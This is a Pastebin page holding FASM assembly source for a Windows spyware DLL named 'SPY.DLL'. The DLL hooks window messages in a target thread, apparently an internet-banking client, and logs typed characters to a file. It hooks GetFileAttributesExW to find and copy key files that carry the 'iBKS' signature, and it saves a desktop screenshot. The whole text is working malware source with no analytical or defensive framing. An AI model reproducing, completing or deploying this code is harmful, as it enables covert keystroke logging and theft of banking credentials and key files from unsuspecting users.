Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- format PE GUI 4.0 DLL
- entry DllEntryPoint
- include 'win32a.inc'
- include 'encoding/win1251.inc'
- HSHELL_WINDOWDESTROYED = 2
- section 'SEX' code readable executable
- struct GdiplusStartupInput
- GdiplusVersion dd ?
- DebugEventCallback dd ?
- SuppressBackgroundThread dd ?
- SuppressExternalCodecs dd ?
- ends
- struct ImageCodecInfo
- Clsid dd 4 dup ?
- FormatID dd 4 dup ?
- CodecName dd ?
- DllName dd ?
- FormatDescription dd ?
- FilenameExtension dd ?
- MimeType dd ?
- Flags dd ?
- Version dd ?
- SigCount dd ?
- SigSize dd ?
- SigPattern dd ?
- SigMask dd ?
- ends
- struct InjCode
- pushOp db ? ;068h
- pushArg dd ? ;pFnc
- retOp db ? ;0c3h
- ends
- proc StrLen str
- push esi
- mov esi, DWord [str]
- xor ecx, ecx
- cld
- jmp .Enter
- .Up:
- inc ecx
- .Enter:
- lodsb
- test al, al
- jnz .Up
- pop esi
- ret
- endp
- proc strreverse str
- push ebx
- mov eax, [str]
- stdcall StrLen, eax
- mov edx, eax
- add edx, ecx
- dec edx
- shr ecx, 01h
- .up:
- cmp ecx, 0h
- jz short .down
- dec ecx
- mov bl, Byte [edx]
- mov bh, Byte [eax]
- mov Byte [eax], bl
- mov Byte [edx], bh
- dec edx
- inc eax
- jmp short .up
- .down:
- pop ebx
- ret
- endp
- proc UIntToStrHex outs, num
- push ebx
- push [outs]
- mov eax, DWord [num]
- mov ecx, 010h
- .Loop:
- xor edx, edx
- div ecx
- cmp dl, 0ah
- jb .next
- add dl, 07h
- .next:
- add dl, 030h
- mov ebx, DWord [outs]
- mov Byte [ebx], dl
- inc DWord [outs]
- cmp eax, 0h
- jnz .Loop
- inc ebx
- mov Byte [ebx], 0h
- pop eax
- stdcall strreverse, eax
- pop ebx
- ret
- endp
- proc DllEntryPoint hInstDLL, fdwReason, lpvReserved
- cmp [fdwReason],DLL_PROCESS_ATTACH
- jnz .End
- push [hInstDLL]
- pop [hInstance]
- .End:
- mov eax, TRUE
- ret
- endp
- proc ScreenShot szPath
- local DesktopDC dd ?
- local hDeskBMP dd ?
- local dcDeskBMP dd ?
- local encNum dd ?
- local encSize dd ?
- local bytesWritten dd ?
- local tGDIP dd ?
- invoke GetWindowDC,0
- mov DWord [DesktopDC],eax
- invoke GetSystemMetrics, SM_CXSCREEN
- mov esi,eax ;esi - screen width
- invoke GetSystemMetrics, SM_CYSCREEN
- mov edi,eax ;edi - screen height
- invoke CreateCompatibleBitmap, [DesktopDC], esi, edi
- mov dword[hDeskBMP],eax
- invoke CreateCompatibleDC,[DesktopDC]
- mov dword[dcDeskBMP],eax
- invoke SelectObject,[dcDeskBMP],[hDeskBMP]
- invoke BitBlt,[dcDeskBMP],0,0,esi,edi,[DesktopDC],0,0,SRCCOPY
- mov dword[tSI.GdiplusVersion],1
- lea eax, [tGDIP]
- invoke GdiplusStartup, eax, tSI, NULL
- lea eax, [frDesktopBitmap]
- invoke GdipCreateBitmapFromHBITMAP,[hDeskBMP],0,eax
- lea eax, [encNum]
- lea ebx, [encSize]
- invoke GdipGetImageEncodersSize, eax, ebx
- invoke VirtualAlloc,0,[encSize],MEM_COMMIT,PAGE_READWRITE
- mov ebx,eax ;ebx - pointer to encoders info memory
- invoke GdipGetImageEncoders,[encNum],[encSize],eax
- lea ecx,[ebx-sizeof.ImageCodecInfo] ;ebp - current encoder being enumerated
- .Loop:
- add ecx,sizeof.ImageCodecInfo
- push ecx
- invoke lstrcmpW,[ecx+ImageCodecInfo.MimeType],encoderMIME
- pop ecx
- test eax,eax
- jnz .Loop
- invoke GdipSaveImageToFile,[frDesktopBitmap],[szPath],ecx,NULL
- invoke VirtualFree,ebx,0,MEM_RELEASE
- invoke GdipDisposeImage,[frDesktopBitmap]
- invoke GdiplusShutdown,[tGDIP]
- invoke DeleteDC,[dcDeskBMP]
- invoke DeleteObject,[hDeskBMP]
- invoke ReleaseDC,0,[DesktopDC]
- ret
- endp
- proc MSG_HOOK_PROC nCode, wParam, lParam
- local KeyBuff dd ?
- local Res dd ?
- local Numbers dq ?
- cmp [nCode], HC_ACTION
- jnz .End
- cmp [iSessionState], 03h ;FINISHED SESSION
- jz .End
- cmp [iSessionState], 02h ;FINISHED SESSION
- jz .End
- cmp [iSessionState], 01h ;SESSION IS ACTIVE
- jz .NextStep
- pusha
- stdcall SpyStartSession
- mov esi, [lParam]
- mov eax, DWord [esi]
- mov [hWndIBank], eax
- mov [iSessionState], 01h
- popa
- .NextStep:
- pusha
- mov esi, [lParam]
- mov eax, DWord [esi+04h]
- cmp ax, WM_CHAR
- jnz short .End2
- mov eax, [esi+08h]
- mov DWord [KeyBuff], eax
- lea eax, [KeyBuff]
- lea ebx, [Res]
- invoke WriteFile, [hLogKbd], eax, 02h, ebx, NULL
- lea eax, [KeyBuff]
- mov Byte [eax+02h], 0h
- .End2:
- popa
- .End:
- pusha
- invoke CallNextHookEx, [hHookMSG], [nCode], [wParam], [lParam]
- mov [Res], eax
- popa
- mov eax, [Res]
- ret
- endp
- macro UnhookInjectSplicing oldProc, OldCodeBuff, iWritten {
- pusha
- invoke WriteProcessMemory, INVALID_HANDLE_VALUE, [oldProc], OldCodeBuff, 06h, OldCodeBuff
- popa }
- proc NewGetFileAttributesExW lpFileName, fInfoLevelId, lpFileInformation
- local Buff dd ?
- local iRead dd ?
- local lastErr dd ?
- push [lpFileInformation]
- push [fInfoLevelId]
- push [lpFileName]
- push .NextStep
- pusha
- invoke WriteProcessMemory, INVALID_HANDLE_VALUE, [GetFileAttributesExW], OldCodeFAExPr, 06h, iWritten
- popa
- jmp [GetFileAttributesExW]
- .NextStep:
- invoke GetLastError
- mov [lastErr], eax
- pusha
- invoke WriteProcessMemory, INVALID_HANDLE_VALUE, [GetFileAttributesExW], InjCodeFAExWPr, 06h, iWritten
- invoke CreateFileW, [lpFileName], GENERIC_READ, NULL, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL
- cmp eax, INVALID_HANDLE_VALUE
- jz .End
- mov esi, eax ; hFile
- invoke GetFileSize, esi, NULL
- cmp eax, 04000h
- ja .CloseHandle
- mov [KeySize], eax
- lea edx, [Buff]
- lea edi, [iRead]
- invoke ReadFile, esi, edx, 04h, edi, NULL
- cmp DWord [iRead], 04h
- jnz .CloseHandle
- mov eax, DWord [iBKS]
- cmp eax, [Buff]
- jnz .CloseHandle
- invoke LocalAlloc, GMEM_ZEROINIT or GMEM_FIXED, [KeySize]
- mov [pBuffKey], eax
- invoke SetFilePointer, esi, NULL, NULL, FILE_BEGIN
- lea edi, [iRead]
- invoke ReadFile, esi, [pBuffKey], [KeySize], edi, NULL
- mov eax, [iLenPath]
- shl eax, 01h
- add eax, 014h
- invoke LocalAlloc, GMEM_ZEROINIT or GMEM_FIXED, eax
- mov ebx, eax
- invoke lstrcat, ebx, szPathLog
- invoke lstrcat, ebx, szJPG
- stdcall ScreenShot, ebx
- invoke LocalFree, ebx
- UnhookInjectSplicing GetFileAttributesExW, OldCodeFAExPr, iWritten
- .CloseHandle:
- invoke CloseHandle, esi
- .End:
- invoke SetLastError, [lastErr]
- popa
- ret
- endp
- proc InjectSplicing newProc, oldProc, InjCodeBuff, OldCodeBuff
- local Bytes dd ?
- pusha
- mov eax, [newProc]
- mov edx, [InjCodeBuff]
- mov Byte [edx+InjCode.pushOp], 068h
- mov DWord [edx+InjCode.pushArg], eax
- mov Byte [edx+InjCode.retOp], 0c3h
- mov ebx, [oldProc]
- lea edx, [Bytes]
- invoke ReadProcessMemory, INVALID_HANDLE_VALUE, ebx, [OldCodeBuff], 06h, edx
- lea edx, [Bytes]
- invoke WriteProcessMemory, INVALID_HANDLE_VALUE, ebx, [InjCodeBuff], 06h, edx
- popa
- ret
- endp
- proc SpyStartSession
- local hWnd dd ?
- local sTitle db 040h dup(?)
- local FT dq ?
- pusha
- invoke SHGetFolderPath, NULL, CSIDL_LOCAL_APPDATA, NULL, 0h, szPathLog
- lea eax, [FT]
- invoke GetSystemTimeAsFileTime, eax
- mov eax, DWord [FT]
- stdcall UIntToStrHex, szSessionASCII, DWord [FT]
- stdcall UIntToStrHex, szSessionASCII+08h, DWord [FT+04h]
- invoke OemToCharW, szSessionASCII, szSessionUnicode
- invoke lstrcat, szPathLog, szPathSession
- invoke lstrlen, szPathLog
- mov [iLenPath], eax
- shl eax, 01h
- add eax, 05h
- invoke LocalAlloc, GMEM_ZEROINIT or GMEM_FIXED, eax
- mov ebx, eax
- invoke lstrcat, ebx, szPathLog
- invoke lstrcat, ebx, szLOG
- invoke CreateFileW, ebx, GENERIC_READ or GENERIC_WRITE, FILE_SHARE_READ or FILE_SHARE_WRITE, NULL, OPEN_ALWAYS, FILE_ATTRIBUTE_NORMAL, 0h
- cmp eax, -1h
- jz .FreeMem
- mov [hLogKbd], eax
- stdcall InjectSplicing, NewGetFileAttributesExW, [GetFileAttributesExW], InjCodeFAExWPr, OldCodeFAExPr
- .FreeMem:
- invoke LocalFree, ebx
- popa
- ret
- endp
- proc SHL_HOOK_PROC nCode, wParam, lParam
- local szBuff db 040h dup (?)
- pusha
- cmp DWORD [nCode], HSHELL_WINDOWDESTROYED
- jnz .End
- invoke CloseHandle, [hLogKbd]
- cmp [KeySize], 0
- jz .FileKeyNotFound
- invoke LocalAlloc, GMEM_ZEROINIT or GMEM_FIXED, 600
- mov ebx, eax
- invoke lstrcat, ebx, szPathLog
- invoke lstrcat, ebx, szKEY
- invoke CreateFileW, ebx, GENERIC_WRITE, 0, 0, OPEN_ALWAYS, FILE_ATTRIBUTE_NORMAL, 0h
- mov edi, eax
- invoke WriteFile, edi, [pBuffKey], [KeySize], iWritten, NULL
- invoke CloseHandle, edi
- invoke LocalFree, ebx
- mov [iSessionState], 03h
- jmp short .End2
- .FileKeyNotFound:
- mov [iSessionState], 02h
- .End2:
- invoke UnhookWindowsHookEx, [hHookMSG]
- invoke UnhookWindowsHookEx, [hHookSHL]
- .End:
- popa
- xor eax, eax
- ret
- endp
- proc InitLogger TID
- pusha
- invoke SetWindowsHookExW, WH_GETMESSAGE, MSG_HOOK_PROC, [hInstance], [TID]
- mov [hHookMSG], eax
- invoke SetWindowsHookExW, WH_SHELL, SHL_HOOK_PROC, [hInstance], [TID]
- mov [hHookSHL], eax
- popa
- xor eax, eax
- ret
- endp
- proc GetSpyState
- mov eax, [iSessionState]
- ret
- endp
- proc GetSpySessionPath
- lea eax, [szPathLog]
- ret
- endp
- section 'DRUGS' data readable writeable shareable
- hHookMSG dd 0h
- hHookSHL dd 0h
- hWndIBank dd 0h
- iSessionState dd 0h
- szPathLog db 0100h dup (0h)
- KeySize dd 0h
- section 'ROCK' data readable writeable
- hInstance dd 0h
- hLogKbd dd ?
- szBuff db 09h dup(0)
- szLOG du '.log', 0
- szKEY du '.key', 0
- szJPG du '.jpg', 0
- InjCodeFAExWPr db 06 dup (?)
- OldCodeFAExPr db 06 dup (?)
- iWritten dd 0h
- iBKS db 069h, 042h, 04bh, 053h
- iLenPath dd 0h
- pBuffKey dd 0h
- szSessionASCII db 012h dup(0h)
- szPathSession db '\',0h
- szSessionUnicode dw 012h dup(0h)
- frDesktopBitmap dd ?
- fPath du 'Bitmap.jpg',0
- encoderMIME du 'image/jpeg',0
- tSI GdiplusStartupInput <>
- GUIDImageEncoderBMP:
- dd 557CF400h
- dw 1A04h,11D3h
- db 09Ah,073h,000h,000h,0F8h,01Eh,0F3h,02Eh
- section 'ROLL' import data readable writeable
- library kernel, 'kernel32.DLL',\
- user, 'user32.DLL',\
- shell, 'shell32.DLL',\
- gdiplus, 'gdiplus.dll',\
- gdi32, 'gdi32.dll'
- import kernel,\
- GetSystemDirectory, 'GetSystemDirectoryA',\
- GetCommandLineW, 'GetCommandLineW',\
- lstrcpy, 'lstrcpyW',\
- lstrcmp, 'lstrcmpA',\
- lstrcmpi, 'lstrcmpiA',\
- lstrcmpW, 'lstrcmpW',\
- lstrcat, 'lstrcatW',\
- lstrlen, 'lstrlenW',\
- Sleep, 'Sleep',\
- ReadProcessMemory, 'ReadProcessMemory',\
- WriteProcessMemory,'WriteProcessMemory',\
- GetStartupInfo, 'GetStartupInfo',\
- GetSystemTimeAsFileTime, 'GetSystemTimeAsFileTime',\
- CreateFileW, 'CreateFileW',\
- CreateFileA, 'CreateFileA',\
- GetLastError, 'GetLastError',\
- GetFileSize, 'GetFileSize',\
- LocalFree, 'LocalFree',\
- VirtualAlloc, 'VirtualAlloc',\
- SetLastError, 'SetLastError',\
- SetFilePointer, 'SetFilePointer',\
- WriteFile, 'WriteFile',\
- ReadFile, 'ReadFile',\
- CloseHandle, 'CloseHandle',\
- SetEndOfFile, 'SetEndOfFile',\
- VirtualProtect, 'VirtualProtect',\
- GetFileAttributesExA, 'GetFileAttributesExA',\
- GetFileAttributesExW, 'GetFileAttributesExW',\
- LocalAlloc, 'LocalAlloc',\
- VirtualFree, 'VirtualFree',\
- ExitProcess,'ExitProcess'
- import user,\
- MessageBoxA, 'MessageBoxA',\
- MessageBoxW, 'MessageBoxW',\
- OemToCharW, 'OemToCharW',\
- GetDC, 'GetDC',\
- GetDeviceCaps, 'GetDeviceCaps',\
- GetSystemMetrics, 'GetSystemMetrics',\
- GetWindowDC, 'GetWindowDC',\
- ReleaseDC, 'ReleaseDC',\
- SetWindowsHookExW, 'SetWindowsHookExW',\
- CallNextHookEx, 'CallNextHookEx',\
- UnhookWindowsHookEx, 'UnhookWindowsHookEx',\
- ToUnicode, 'ToUnicode',\
- GetWindowLong, 'GetWindowLongA',\
- GetWindowThreadProcessId, 'GetWindowThreadProcessId',\
- GetClassNameA, 'GetClassNameA'
- import shell,\
- SHGetFolderPath, 'SHGetFolderPathW'
- import gdiplus,\
- GdipCreateBitmapFromHBITMAP,'GdipCreateBitmapFromHBITMAP',\
- GdipDisposeImage,'GdipDisposeImage',\
- GdiplusStartup,'GdiplusStartup',\
- GdiplusShutdown,'GdiplusShutdown',\
- GdipSaveImageToFile,'GdipSaveImageToFile',\
- GdipGetImageEncodersSize,'GdipGetImageEncodersSize',\
- GdipGetImageEncoders,'GdipGetImageEncoders'
- import gdi32,\
- CreateCompatibleDC,'CreateCompatibleDC',\
- DeleteDC,'DeleteDC',\
- CreateCompatibleBitmap,'CreateCompatibleBitmap',\
- DeleteObject,'DeleteObject',\
- SelectObject,'SelectObject',\
- BitBlt,'BitBlt'
- section 'NIRVANA' export data readable
- export 'SPY.DLL',\
- InitLogger, 'StartSpy',\
- GetSpyState, 'GetSpyState',\
- GetSpySessionPath, 'GetSpySessionPath'
- section 'CASH' fixups data discardable
Advertisement
Add Comment
Please, Sign In to add comment
